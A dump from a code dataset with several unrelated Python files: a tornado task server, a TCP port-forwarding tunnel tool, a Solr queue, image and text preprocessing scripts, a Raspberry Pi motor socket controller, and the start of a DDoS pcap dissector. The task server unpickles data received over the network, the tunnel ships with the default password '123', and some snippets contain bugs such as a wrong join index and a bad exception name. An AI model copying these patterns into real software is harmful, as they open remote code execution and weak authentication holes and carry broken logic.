source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
__init__.py
|
import pickle
import functools
import tornado.web
from lp import *
from attrs import *
from task import *
def call(fn):
fn()
class viewer(tornado.web.RequestHandler, Attrs):
viewers = []
app = None
@classmethod
def observe(cls, model, point=r"/"):
cls.viewers.append((point, cls, dict(model=model)))
@classmethod
def init(cls):
cls.app = tornado.web.Application(cls.viewers)
cls.app.listen(cls.viewport)
print "Viewer started at", cls.viewport
def initialize(self, model):
self.model = model
@property
def progress(self):
return float(len(self.model.complete))/self.model.count_tasks
def get(self):
self.write("Hello!<br/>")
self.write("Currently complete %.2f%%" % self.progress)
class server(TCPServer, Attrs):
@classmethod
def spawn(cls, fn):
@functools.wraps(fn)
def wraped():
cls.instance = cls(fn)
viewer.observe(cls.instance)
viewer.init()
lp.start()
return wraped
def __init__(self, genfn):
TCPServer.__init__(self)
self.tasks = list(genfn())
self.count_tasks = len(self.tasks)
self.tasks = iter(enumerate(self.tasks))
self.complete = list()
self.listen(self.port)
self.start()
print "Server started at", self.port
@gen.coroutine
def handle_stream(self, stream, address):
while True:
try:
i, task = self.tasks.next()
data = yield stream.read_until(self.sep)
prev, data = pickle.loads(data)
if data != "hi":
print "From %s:%s received %s for %s" % (address[0], address[1], data, prev)
self.complete.append((prev, data))
else:
print "Connected:", address
task = Task(*task[0], **task[1])
yield stream.write(pickle.dumps(task) + self.sep)
except StreamClosedError:
return
except StopIteration:
break
while True:
yield stream.write(pickle.dumps(self.notask) + self.sep)
class client(TCPClient, Attrs):
ret = (None, Attrs.greet)
@classmethod
def spawn(cls, fn):
@classmethod
def spawner(cls):
instance = cls(fn)
lp.start()
cls.spawner = spawner
@functools.wraps(fn)
def wraped(count):
from multiprocessing import Process
processes = []
for i in xrange(0, count):
processes.append(Process(target=cls.spawner))
processes[-1].start()
for p in processes:
p.join()
return wraped
def __init__(self, workfn):
TCPClient.__init__(self)
self.stream = None
self.workfn = workfn
@call
@gen.coroutine
def wrap():
print "Connecting to", self.port
self.stream = yield self.connect("localhost", self.port)
self.stream.set_nodelay(True)
lp.later(self.take)
@gen.coroutine
def take(self):
import time
while self.stream is None:
print "Still connecting to %d..." % self.port
yield gen.Task(IOLoop.instance().add_timeout, time.time() + 0.05)
print "Connected!"
try:
while True:
self.stream.write(pickle.dumps(self.ret) + self.sep)
self.ret = yield self.stream.read_until(self.sep)
self.ret = pickle.loads(self.ret)
print "Received task:", self.ret
self.ret = self.ret, self.workfn(*self.ret, **self.ret)
print "Complete task (%s): %s" % self.ret
except StreamClosedError:
return
|
tunnel.py
|
from __future__ import print_function
import sys, time, json
import socket
__version__ = '2.2.0'
READ_BUF_LEN = 1300
TIME_WAIT_SEND_S = 3
TIME_FOR_PING_S = 30
IS_PY3 = sys.version_info >= (3, 0)
def print_it(*args):
print(time.time(), *args)
def send_str(sock, msg, code=0):
if sock:
sock.sendall(msg.encode('utf-8'))
def start_thread(target=None, args=[]):
import threading
th = threading.Thread(target=target, args=args)
th.setDaemon(True)
th.start()
return True
def make_package(target, data):
if isinstance(data, str) and IS_PY3:
data = data.encode()
package = str(target).encode() + 'L'.encode() + str(len(data)).encode() + 'D'.encode() + data
return package
def parse_package(package=''):
lix = package.index('L'.encode())
target = int(package[0:lix])
dix = package.index('D'.encode())
len = int(package[lix + 1:dix])
data = package[dix + 1:]
return target, len, data
def sock_read(sock, buflen=READ_BUF_LEN):
recv = b''
if sock:
try:
recv = sock.recv(buflen)
except:
import traceback
traceback.print_exc()
return recv
def sock_send(sock, data):
if type(data) == type('') and IS_PY3:
# str
data = data.encode()
if sock:
try:
sock.sendall(data)
return True
except:
import traceback
traceback.print_exc()
return False
def msg_to_sock(sock, msg):
msg = '[V%s]%s' % (__version__, msg)
send_package(sock, 0, msg.encode())
_sock_recv = {}
_sock_io_map = {}
def sock_str(sock):
import re
s = str(sock)
rs = re.findall("laddr=\('(\S+)', (\d+)\), raddr=\('(\S+)', (\d+)\)", s)
return '%s<->%s' % (rs[0][1], rs[0][3]) if rs else s
def read_package(sock):
if not sock:
print_it("read_package with none")
import traceback
traceback.print_stack()
return
sockid = int(id(sock))
if sockid not in _sock_io_map:
_sock_io_map[sockid] = SockIO(sock)
try:
package = _sock_io_map[sockid].recv()
data = parse_package(package)
if data:
return data[0], data[2]
except:
import traceback
traceback.print_exc()
return None
def send_package(sock, ix, data):
if not sock:
print_it("send_package with none")
import traceback
traceback.print_stack()
return
sockid = int(id(sock))
if sockid not in _sock_io_map:
_sock_io_map[sockid] = SockIO(sock)
return _sock_io_map[sockid].send(make_package(ix, data))
def sock_close(sock, shut=False):
if not sock:
return
if shut:
try:
# sock_send(sock, 'c')
sock.shutdown(2)
except:
import traceback
# traceback.print_exc()
# sock.send(b'')
sock.close()
sockid = int(id(sock))
if sockid in _sock_io_map:
del _sock_io_map[sockid]
# print_it('-----sock_close-----', sock, shut)
# import traceback
# traceback.print_stack()
# print_it('---end sock_close---')
class Lock(object):
def __init__(self, name='default'):
from threading import Lock
self.name = name
self.lock = Lock()
def __enter__(self):
# print_it('locking', self.name)
self.lock.acquire()
# print_it('locked', self.name)
def __exit__(self, *unused):
self.lock.release()
# print_it('released', self.name)
class PackageIt(object):
head = b'DH'
leng = b':'
buffer = b''
def feed(self, data):
if isinstance(data, str) and IS_PY3:
data = data.encode()
self.buffer += data
def recv(self):
hix = self.buffer.find(self.head)
if hix >= 0:
lix = self.buffer.find(self.leng, hix + len(self.head))
if lix > 0:
lns = self.buffer[hix + len(self.head): lix]
pend = lix + len(self.leng) + int(lns)
if len(self.buffer) >= pend:
data = self.buffer[lix + len(self.leng):pend]
self.buffer = self.buffer[pend:]
return data
return None
def make(self, data):
if isinstance(data, str) and IS_PY3:
data = data.encode()
pack = self.head + str(len(data)).encode() + self.leng + data
return pack
class SockIO(object):
BUF_LEN = 1024
_pi = PackageIt()
_recv_lock = Lock()
_send_lock = Lock()
def __init__(self, sock):
self.sock = sock
assert sock
def recv(self):
with self._recv_lock:
while True:
data = self._pi.recv()
if data == None:
r = self.sock.recv(self.BUF_LEN)
if not r:
raise Exception(u'Socket Error:%s' % str(self.sock))
# print(sock_str(self.sock), 'recv', r)
self._pi.feed(r)
else:
break
return data
def send(self, data):
if isinstance(data, str) and IS_PY3:
data = data.encode()
pack = self._pi.make(data)
ret = False
with self._send_lock:
try:
self.sock.sendall(pack)
ret = True
except:
import traceback
traceback.print_exc()
return ret
def close(self):
self.sock.close()
class Base(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class Runable(Base):
_thread = None
_running = False
def __str__(self):
return '%s' % (self.__class__.__name__)
def _log(self, msg, *args):
print_it(self, msg, *args)
def _run(self):
pass
def _start_run(self):
self._log('start run')
self._run()
self._running = False
self._log('end run')
def start(self):
if not self._running:
self._running = True
th = start_thread(target=self._start_run)
self._thread = th
return th
def stop(self):
self._running = False
self._log('_running', self._running)
class SockRunable(Runable):
_sock = None
def _run(self):
pass
def stop(self):
if self._sock:
self._log('close _sock', self._sock)
sock_close(self._sock, True)
self._sock = None
super(SockRunable, self).stop()
class Tunnel(SockRunable):
sock = None
bind = '0.0.0.0'
port = 0
_client_map = {}
_client_ix = 0
_lock = Lock()
def __str__(self):
return '%s[%d]' % (self.__class__.__name__, self.port)
def _run_con(self, sock, ix):
send_package(self.sock, ix, b'')
while self._running:
recv = sock_read(sock)
# self._log('conn read', ix, len(recv), recv[0:20])
if not self.sock:
break
error = False
if recv:
if not send_package(self.sock, ix, recv):
self.stop()
break
else:
self._log('a con dis, close', ix)
send_package(self.sock, -1 * ix, b'close')
sock_close(sock)
self._del_con(ix)
break
def _del_con(self, ix):
with self._lock:
if ix in self._client_map:
self._log('disconn', ix)
sock_close(self._client_map[ix]['sock'], True)
del self._client_map[ix]
def _add_con(self, sock, addr):
with self._lock:
self._log('add %s %s' % (sock, addr))
self._client_ix += 1
th = start_thread(self._run_con, [sock, self._client_ix])
self._client_map[self._client_ix] = {
'th': th,
'sock': sock
}
return th
def _run_sock(self):
while self._running:
recv = read_package(self.sock)
if recv:
ix, data = recv
if ix > 0:
if ix in self._client_map:
d = self._client_map[ix]
# self._log('trans', ix, data)
sock_send(d['sock'], data)
elif ix == 0:
if data == b'ping':
send_package(self.sock, 0, b'pong')
elif data == b'pong':
pass
else:
self._del_con(abs(ix))
else:
self.stop()
def _run_ping(self):
while self._running:
send_package(self.sock, 0, b'ping')
time.sleep(TIME_FOR_PING_S)
def _run(self):
try:
self._sock_th = start_thread(self._run_sock)
self._ping_th = start_thread(self._run_ping)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._log('binding %s:%s' % (self.bind, self.port))
# sock.setblocking(False)
sock.bind((self.bind, self.port), )
sock.listen(1000)
self._sock = sock
self._log('running tunnel %s:%s' % (self.bind, self.port))
while self._running:
try:
clt_con, clt_add = sock.accept()
ret = False
if self._running:
ret = self._add_con(clt_con, clt_add)
if not ret:
sock_close(clt_con)
except:
import traceback
traceback.print_exc()
self.stop()
except Exception as e:
import traceback
traceback.print_exc()
msg_to_sock(self.sock, e)
def stop(self):
with self._lock:
if self.sock:
self._log('close sock', self.sock)
sock_close(self.sock)
self.sock = None
for d in self._client_map.values():
sock_close(d['sock'], True)
self._client_map.clear()
if self._sock:
sock_close(self._sock)
self._sock = None
self._running = False
# In Python2, connect to listen port to raise close and release.
# try:
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# s.connect(('127.0.0.1', self.port), )
# except:
# import traceback
# traceback.print_exc()
super(Tunnel, self).stop()
self._log('stop')
class Server(SockRunable):
bind = '0.0.0.0'
port = 1990
passwd = '123'
_tunprocs_map = {}
_tunprocs_lock = Lock()
def _ready(self, sock, addr):
_, auth = read_package(sock)
# self._log('auth', auth)
data = json.loads(auth)
# self._log('tun req data', data)
if self.passwd and self.passwd != data.get('passwd'):
# send_str(sock, 'password error!')
self._log('Password Error!!!')
send_package(sock, 0, json.dumps({'status': 'error', 'message': "Password Error!!!"}))
return
send_package(sock, 0, json.dumps({'status': 'ok', 'version': __version__}))
if data.get('command'):
cmds = data['command'].split(' ')
cmd = cmds[0]
if cmd == 'status':
ret = '; '.join([d['key'] for d in self._tunprocs_map.values()])
send_package(sock, 0, json.dumps({'status': 'success', 'message': ret}))
elif cmd == 'kill':
wkills = set(cmds[1:])
killeds = set()
for p, cxt in self._tunprocs_map.items():
if 'all' in wkills or cxt['key'] in wkills:
self._close_tun_cxt(cxt)
killeds.add(cxt['key'])
send_package(sock, 0, json.dumps({'status': 'success', 'message': '; '.join(killeds)}))
else:
send_package(sock, 0, json.dumps({'status': 'error', 'message': "Unknow %s" % cmd}))
return
cxt = {'sock': sock}
data.setdefault('bind', '0.0.0.0')
for k in ['bind', 'port']:
if data.get(k):
cxt[k] = data[k]
cxt['key'] = '%s:%s' % (cxt['bind'], cxt['port'])
self._log('new client version: %s' % data['version'])
from multiprocessing import Process
def tunrun():
t = Tunnel(**cxt)
t.start()
# cxt['tun'] = t
while t._running and self._running:
time.sleep(3)
proc = Process(target=tunrun)
proc.start()
with self._tunprocs_lock:
cxt['proc'] = proc
self._tunprocs_map[proc] = cxt
return proc
def _close_tun_cxt(self, cxt):
sock = cxt.pop('sock', None)
proc = cxt.pop('proc', None)
try:
if sock:
sock_close(sock)
except:
pass
try:
if proc:
proc.terminate()
except:
pass
def _check_tunprocs(self):
while self._running:
delps = []
for p in self._tunprocs_map:
if not p.is_alive():
delps.append(p)
if delps:
with self._tunprocs_lock:
for p in delps:
cxt = self._tunprocs_map[p]
self._close_tun_cxt(cxt)
self._log('remove process', cxt)
del self._tunprocs_map[p]
self._log('now process count=%d' % len(self._tunprocs_map))
time.sleep(10)
def _run(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._log('binding %s:%s' % (self.bind, self.port))
sock.bind((self.bind, self.port), )
sock.listen(1000)
self._sock = sock
self._log('running server %s:%s' % (self.bind, self.port))
except:
import traceback
traceback.print_exc()
self.stop()
start_thread(target=self._check_tunprocs)
while self._running:
try:
clt_con, clt_add = self._sock.accept()
self._log('new client req', clt_con, clt_add)
try:
ret = self._ready(clt_con, clt_add)
if not ret:
time.sleep(TIME_WAIT_SEND_S)
sock_close(clt_con)
except:
import traceback
traceback.print_exc()
except:
import traceback
traceback.print_exc()
self.stop()
class Client(SockRunable):
server = '192.168.1.102'
port = 1990
passwd = '123'
proxy_port = 1091
proxy_bind = '0.0.0.0'
target_host = '127.0.0.1'
target_port = 6379
command = ''
_client_map = {}
def _run_con(self, ix, sock):
while self._running:
recv = sock_read(sock)
if len(recv):
send_package(self._sock, ix, recv)
else:
send_package(self._sock, -1 * ix, b'close')
self._log('a do discon', ix)
time.sleep(TIME_WAIT_SEND_S)
sock_close(sock)
break
def _add_con(self, ix):
try:
self._log('add conn', ix)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._log('connecting target %s:%s' % (self.target_host, self.target_port))
sock.connect((self.target_host, self.target_port), )
self._log('connected target %s:%s' % (self.target_host, self.target_port))
self._client_map[ix] = {
'sock': sock,
'th': start_thread(target=self._run_con, args=[ix, sock])
}
return self._client_map[ix]
except:
import traceback
traceback.print_exc()
def _run_ping(self):
while self._running:
send_package(self._sock, 0, b'ping')
time.sleep(TIME_FOR_PING_S)
def _run(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock = sock
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._log('connecting server %s:%s' % (self.server, self.port))
sock.connect((self.server, self.port), )
self._log('connected server %s:%s' % (self.server, self.port))
self._log('verifying...')
send_package(sock, 0, json.dumps({'version': __version__, 'command': self.command, 'passwd': self.passwd, 'bind': self.proxy_bind, 'port': self.proxy_port}))
_, data = read_package(sock)
ret = json.loads(data)
if ret['status'] == 'ok':
self._log('server version V%s, verified!' % ret['version'])
else:
self._log('\033[31m%s: %s\033[0m' % (ret['status'], ret['message']))
raise Exception(ret['message'])
except:
import traceback
traceback.print_exc()
self.stop()
return
self._ping_th = start_thread(target=self._run_ping)
self._log('tunnel', '%s:%s' % (self.target_host, self.target_port), '<->', '%s:%s' % (self.server, self.proxy_port))
while self._running:
recv = read_package(sock)
if recv:
ix, data = recv
if ix > 0:
if ix not in self._client_map:
# new connect
d = self._add_con(ix)
else:
d = self._client_map[ix]
if d:
# self._log('trans', ix, data[0:20])
sock_send(d['sock'], data)
else:
send_package(sock, -1 * ix, b'')
elif ix == 0:
# message
if data == b'ping':
send_package(sock, 0, b'pong')
elif data == b'pong':
pass
else:
self._log('[Server]\033[31m%s\033[0m' % data.decode())
self.stop()
else:
nix = abs(ix)
if nix in self._client_map:
if data == b'ping':
# ping
send_package(sock, -1 * ix, b'pong')
elif not data or data == b'close':
d = self._client_map[nix]
sock_close(d['sock'])
del self._client_map[nix]
self._log('discon', nix)
else:
self.stop()
def stop(self):
for d in self._client_map.values():
sock_close(d['sock'])
self._client_map.clear()
super(Client, self).stop()
self._log('stop')
def parse_endpoint(s):
if ':' in s:
r = s.split(':')
return r[0], int(r[1])
elif s:
return '0.0.0.0', int(s)
raise Exception(u'%s not a endpoint type!' % s)
def main():
import time, signal, argparse
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-t', '--target', help='target endpoint, such as: 127.0.0.1:8080', type=parse_endpoint)
parser.add_argument('-s', '--server', help='server endpoint, such as: 192.168.1.3:1990', type=parse_endpoint)
parser.add_argument('-p', '--port', help='server proxy port, such as: 192.168.1.3:1090', type=parse_endpoint)
parser.add_argument('-b', '--bind', help='the server bind endpoint, such as: 0.0.0.0:1990', type=parse_endpoint)
parser.add_argument('-e', '--passwd', help='the password, default is empty', type=str, default='')
parser.add_argument('-c', '--command', help='the method, default is empty', nargs='+', type=str, default='')
args = parser.parse_args()
if args.bind:
# server
d = {
'bind': args.bind[0],
'port': args.bind[1],
'passwd': args.passwd,
}
run = Server(**d)
elif args.server:
# client
d = {
'server': args.server[0],
'port': args.server[1],
'proxy_bind': args.port[0] if args.port else '0.0.0.0',
'proxy_port': args.port[1] if args.port else 8080,
'target_host': args.target[0] if args.target else '127.0.0.1',
'target_port': args.target[1] if args.target else 8080,
'passwd': args.passwd,
'command': ' '.join(args.command),
}
run = Client(**d)
else:
parser.print_help()
exit(-1)
def stop(a, b):
print_it('stop')
run.stop()
signal.signal(signal.SIGINT, stop)
print_it('---pytunnel V%s---' % __version__)
run.start()
while run._running:
time.sleep(1)
time.sleep(1)
if __name__ == '__main__':
main()
|
solrqueue.py
|
from datetime import datetime
import logging
from queue import Empty, Full, Queue
import threading
from haystack.utils import get_identifier
from api_v2.search.index import TxnAwareSearchIndex
LOGGER = logging.getLogger(__name__)
class SolrQueue:
def __init__(self):
self._queue = Queue()
self._prev_queue = None
self._stop = threading.Event()
self._thread = None
self._trigger = threading.Event()
def add(self, index_cls, using, instances):
ids = [instance.id for instance in instances]
LOGGER.debug("Solr queue add %s", ids)
try:
self._queue.put( (index_cls, using, ids, 0) )
except Full:
LOGGER.warning("Solr queue full")
def delete(self, index_cls, using, instances):
ids = [get_identifier(instance) for instance in instances]
LOGGER.debug("Solr queue delete %s", ids)
try:
self._queue.put( (index_cls, using, ids, 1) )
except Full:
LOGGER.warning("Solr queue full")
def setup(self, app=None):
if app:
app["solrqueue"] = self
app.on_startup.append(self.app_start)
app.on_cleanup.append(self.app_stop)
self._prev_queue = TxnAwareSearchIndex._backend_queue
TxnAwareSearchIndex._backend_queue = self
async def app_start(self, _app=None):
self.start()
async def app_stop(self, _app=None):
self.stop()
def __enter__(self):
self.setup()
self.start()
return self
def __exit__(self, type, value, tb):
# if handling exception, don't wait for worker thread
self.stop(not type)
TxnAwareSearchIndex._backend_queue = self._prev_queue
def start(self):
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self, join=True):
self._stop.set()
self._trigger.set()
if join:
self._thread.join()
def trigger(self):
self._trigger.set()
def _run(self):
while True:
self._trigger.wait(5)
self._drain()
if self._stop.is_set():
return
def _drain(self):
last_index = None
last_using = None
last_del = 0
last_ids = set()
while True:
try:
index_cls, using, ids, delete = self._queue.get_nowait()
except Empty:
index_cls = None
if last_index and last_index == index_cls and last_using == using and last_del == delete:
last_ids.update(ids)
else:
if last_index:
if last_del:
self.remove(last_index, last_using, last_ids)
else:
self.update(last_index, last_using, last_ids)
if not index_cls:
break
last_index = index_cls
last_using = using
last_del = delete
last_ids = set(ids)
def update(self, index_cls, using, ids):
index = index_cls()
backend = index.get_backend(using)
if backend is not None:
LOGGER.debug("Updating %d row(s) in solr queue: %s", len(ids), ids)
rows = index.index_queryset(using).filter(id__in=ids)
backend.update(index, rows)
else:
LOGGER.error("Failed to get backend. Unable to update %d row(s) in solr queue: %s", len(ids), ids)
def remove(self, index_cls, using, ids):
index = index_cls()
backend = index.get_backend(using)
if backend is not None:
LOGGER.debug("Removing %d row(s) in solr queue: %s", len(ids), ids)
# backend.remove has no support for a list of IDs
backend.conn.delete(id=ids)
else:
LOGGER.error("Failed to get backend. Unable to update %d row(s) in solr queue: %s", len(ids), ids)
|
parallel_npy2dzi.py
|
import os
import time
import subprocess
from multiprocessing import Process
import fire
import numpy as np
import PIL
from PIL import Image
import os
import sys
import deepzoom
import time
import shutil
def worker(wsi_name, web_dir, shrink_factor):
# disable safety checks for large images
PIL.Image.MAX_IMAGE_PIXELS = None
assert(wsi_name[-4:] == ".npy")
wsi_prefix = wsi_name[:-4]
prefix_path = os.path.join(web_dir, "images", wsi_prefix)
npy_path = prefix_path + ".npy"
png_path = prefix_path + ".png"
dzi_path = prefix_path + ".dzi"
base_html_path = "npy2dzi.html"
new_html_path = os.path.join(web_dir, "index.html")
openseadragon_src = "openseadragon/"
openseadragon_dst = os.path.join(web_dir, "openseadragon/")
iter_name = web_dir[web_dir.rindex("/") + 1:]
title = iter_name + " " + wsi_name
START_TIME = time.time()
print("Loading .npy file")
img = np.load(npy_path)
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
START_TIME = time.time()
print("Reducing .npy file")
if shrink_factor == 1:
comp_img = img
else:
comp_img = np.zeros((img.shape[0] // shrink_factor, img.shape[1] // shrink_factor, img.shape[2]), dtype=np.uint32)
print(comp_img.shape)
for i in range(shrink_factor):
j1 = img.shape[0] - img.shape[0] % shrink_factor
j2 = img.shape[1] - img.shape[1] % shrink_factor
comp_img += img[i:j1:shrink_factor, i:j2:shrink_factor]
comp_img //= shrink_factor
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
# create png files
START_TIME = time.time()
print("Creating .png file")
Image.fromarray(comp_img.astype(np.uint8)).save(png_path, compress_level=1)
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
# create dzi files
START_TIME = time.time()
print("Creating .dzi file")
creator = deepzoom.ImageCreator(
tile_size=256,
tile_overlap=0,
tile_format="png",
image_quality=1.0,
)
creator.create(png_path, dzi_path)
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
START_TIME = time.time()
print("Creating HTML files")
# create html files
with open(base_html_path, "r") as f:
HTML_STR = "".join(f.readlines())
HTML_STR = HTML_STR.replace("{REPLACE_wsi_prefix}", os.path.join("images", wsi_prefix))
HTML_STR = HTML_STR.replace("{REPLACE_title}", title)
with open(new_html_path, "w") as f:
f.write(HTML_STR)
# copy openseadragon
if not os.path.isdir(openseadragon_dst):
shutil.copytree(openseadragon_src, openseadragon_dst)
print("Execution time (s):", time.time() - START_TIME)
print("Done.\n")
def main(wsi_prefix, model_name, shrink_factor, start_iter, end_iter, incr_iter):
PROGRAM_START_TIME = time.time()
START_ITER = 1003200
END_ITER = 1104000
INCR_ITER = 4800
SHRINK_FACTOR = 2
WSI_NAME = str(wsi_prefix) + "_converted.npy"
jobs = []
for i in range(START_ITER, END_ITER + 1, INCR_ITER):
WEB_DIR = "./results/" + model_name + "/test_latest_iter" + str(i)
p = Process(target=worker, args=(WSI_NAME, WEB_DIR, shrink_factor))
jobs += [p]
p.start()
if __name__=="__main__":
fire.Fire(main)
|
pangeamt_files_preprocess.py
|
#!/usr/bin/env python
import os
import json
import argparse
from multiprocessing import Process
from pangeamt_toolkit.processors import Pipeline
# Parallel preprocess of train, dev and test files.
def _get_parser():
parser = argparse.ArgumentParser(description='Preprocess file.')
parser.add_argument('config', help="Path to config file")
parser.add_argument('data', help="Path to data folder")
parser.add_argument('src', help='Src lang')
parser.add_argument('tgt', help='Tgt lang')
return parser
def _load_pipelines(config, src_lang, tgt_lang):
# Loads the main config for the source files and the secondary config
# for the target files
with open(config, 'r') as config_file:
config = json.load(config_file)
print('Loading pipelines..')
pipelines = {
src_lang:\
Pipeline(config['pipeline_config'], config['src_lang'],\
config['tgt_lang']),
tgt_lang:\
Pipeline(config['pipeline_config_tgt'], config['tgt_lang'])
}
print('Pipelines loaded..')
return pipelines
def _process(lang, pipelines):
pipeline = pipelines[lang]
files = ['train', 'dev', 'test']
for file in files:
path = f'{args.data}/{file}.{lang}'
# Checks if the file exists
if os.path.isfile(path):
print(f"Started processing {path.split('/')[-1]}")
pipeline.preprocess_file(path)
print(f"Finished processing {path.split('/')[-1]}")
else:
pass
def main(args):
langs = [args.src, args.tgt]
to_join = []
# loads the pipelines
pipelines = _load_pipelines(args.config, args.src, args.tgt)
for lang in langs:
# Creates and spawns a process to parallelise the preprocess
p = Process(target=_process, args=(lang, pipelines,))
p.start()
to_join.append(p)
# Waits for all the processes to finish
for p in to_join:
p.join()
if __name__ == "__main__":
parser = _get_parser()
args = parser.parse_args()
os.chdir(os.path.dirname(os.path.realpath(args.config)))
main(args)
|
socket_test.py
|
import os #importing os library so as to communicate with the system
import time #importing time library to make Rpi wait because its too impatient
time.sleep(1) # As i said it is too impatient and so if this delay is removed you will get an error
import socket
import queue
import threading
max_value = 1675 #change this if your ESC's max value is different or leave it be
min_value = 1500 #change this if your ESC's min value is different or leave it be
accelerate_value = 1800
brake_value = 1300
actual_max_speed = 0.83 # m/s
class DataCapture:
def __init__(self):
self.conn, self.addr = serv.accept()
self.q = queue.Queue()
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# read data as soon as they are available, keeping only most recent one
def _reader(self):
while True:
data = self.conn.recv(1024)
if not data:
self.q.put(data)
break
if not self.q.empty():
try:
self.q.get_nowait() # discard previous (unprocessed) frame
except Queue.Empty:
pass
self.q.put(data)
def recv(self):
return self.q.get()
def close(self):
self.conn.close()
def arm(): #This is the arming procedure of an ESC
print("RPI is arming")
time.sleep(3)
def start_up():
print(f"accelerating: {accelerate_value}")
time.sleep(0.3)
def set_speed(speed):
#TODO interpolate speed values to the corresponding input values by ESC
span = max_value - min_value
# Convert the left range into a 0-1 range (float)
value_scaled = speed / actual_max_speed
# Convert the 0-1 range into a value in the right range.
output = int((value_scaled * span) + min_value)
print (f"speed: {speed}; output: {output}")
def full_brake():
print (f"brake: {brake_value}")
def stop(): #This will stop every action your Pi is performing for ESC ofcourse.
print("stopping RPI")
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.bind(('0.0.0.0', 9999))
serv.listen(5)
while True:
conn = DataCapture()
start_up_toggle = True
is_stopped = True
while True:
print ("Initializing...")
data = conn.recv()
if not data: break
if data.decode('ascii') == "init":
arm()
start_up_toggle = True
break
while True:
data = conn.recv()
if not data: break
speed = float(data.decode('ascii'))
if start_up_toggle and speed > 0:
start_up()
start_up_toggle = False
is_stopped = False
if speed == 0:
start_up_toggle = True
if not is_stopped:
full_brake()
is_stopped = True
set_speed(speed)
if not is_stopped:
full_brake()
conn.close()
print ('client disconnected')
stop()
|
subprocess.py
|
from threading import Thread
import pyrealtime as prt
class SubprocessLayer(prt.TransformMixin, prt.ThreadLayer):
def __init__(self, port_in, cmd, *args, encoder=None, decoder=None, **kwargs):
super().__init__(port_in, *args, **kwargs)
self.cmd = cmd
self.proc = None
self.read_thread = None
self._encode = encoder if encoder is not None else self.encode
self._decode = decoder if decoder is not None else self.decode
def encode(self, data):
return data + "\n"
def decode(self, data):
return data.rstrip().decode('utf-8')
def initialize(self):
try:
import pexpect.popen_spawn
except ImportError:
raise ModuleNotFoundError("pexpect required to use subprocess layers")
self.proc = pexpect.popen_spawn.PopenSpawn(self.cmd)
self.read_thread = Thread(target=self.read_loop)
self.read_thread.start()
def read_loop(self):
import pexpect
while True:
try:
index = self.proc.expect(".*\n")
data = self.proc.match[index]
self.handle_output(self._decode(data))
except pexpect.exceptions.EOF:
print("end of file")
return prt.LayerSignal.STOP
def transform(self, data):
self.proc.write(self._encode(data))
return None
|
prog3.py
|
def gpuWrap(dv, q):
q.add(dv.apply(useGPUs))
def fWrap(dv, i, q):
q.add(dv.apply(f, i))
# we assume that the engines have been correctly instantiated
def main( ):
q = Queue.Queue() # collect results in here
threads = []
seqNum = 1
c = Client()
for i in range(100):
dv = c[i]
if i % 4 == 0:
# we assume the GPU is attached to processing element 0
t = threading.Thread(target=gpuWrap, args=(dv, q))
else:
t = threading.Thread(target=fWrap, args=(dv, seqNum, q))
seqNum = seqNum + 1
threads.append(t)
for thread in threads:
thread.start()
for thread in threads:
threads[i].join()
# at this point q should be full of AsyncResult objects that can be used to
# get the results of the individual processes as they complete
|
ddos_dissector.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###############################################################################
# Concordia Project
#
# This project has received funding from the European Union’s Horizon
# 2020 Research and Innovation program under Grant Agreement No 830927.
#
# Joao Ceron - joaoceron@sidn.nl
###############################################################################
###############################################################################
### Python modules
import time
import threading
import sys
import subprocess
import socket
import signal
import shutil
import requests
import re
import copy
import queue as queue
import pandas as pd
import os
import numpy as np
import logging
import json
import hashlib
import cursor
import configparser
import ipaddr
import argparse
import urllib3
from subprocess import check_output, STDOUT
from pygments.lexers import JsonLexer
from pygments.formatters import TerminalFormatter
from pygments import highlight
from io import StringIO
from datetime import datetime
from argparse import RawTextHelpFormatter
from hashlib import sha256
###############################################################################
### Program settings
verbose = False
program_name = os.path.basename(__file__)
version = "3.2"
# GLOBAL parameters
# percentage used to determine correlation between to lists
SIMILARITY_THRESHOLD = 80
NONE = -1
FLOW_TYPE = 0
PCAP_TYPE = 1
CARPET_BOMBING_SIMILARITY_THRESHOLD = 20
# define local subnet (CIDR size)
CARPET_BOMBING_SUBNET = 20
###############################################################################
### Subrotines
#------------------------------------------------------------------------------
def parser_add_arguments():
"""
Parse comamnd line parameters
"""
parser = argparse.ArgumentParser(prog=program_name, usage='%(prog)s [options]', epilog="Example: ./%(prog)s -f ./pcap_samples/sample1.pcap --summary --upload ", formatter_class=RawTextHelpFormatter)
parser.add_argument("--version", help="print version and exit", action="store_true")
parser.add_argument("-v","--verbose", help="print info msg", action="store_true")
parser.add_argument("-d","--debug", help="print debug info", action="store_true")
parser.add_argument("-q","--quiet", help="ignore animation", action="store_true")
parser.add_argument("--status", dest='status', help="check available repositories", action="store_true")
parser.add_argument("-s","--summary", help="present fingerprint evaluation summary", action="store_true")
parser.add_argument("-u","--upload", help="upload to the selected repository", action="store_true")
parser.add_argument("--log", default='ddos_dissector.log', nargs='?',help="Log filename. Default =./ddos_dissector.log\"")
parser.add_argument("--fingerprint_dir", default='fingerprints', nargs='?',help="Fingerprint storage directory. Default =./fingerprints\"")
parser.add_argument("--config", default='ddosdb.conf', nargs='?',help="Configuration File. Default =./ddosdb.conf\"")
parser.add_argument("--host", nargs='?',help="Upload host. ")
parser.add_argument("--user", nargs='?',help="repository user. ")
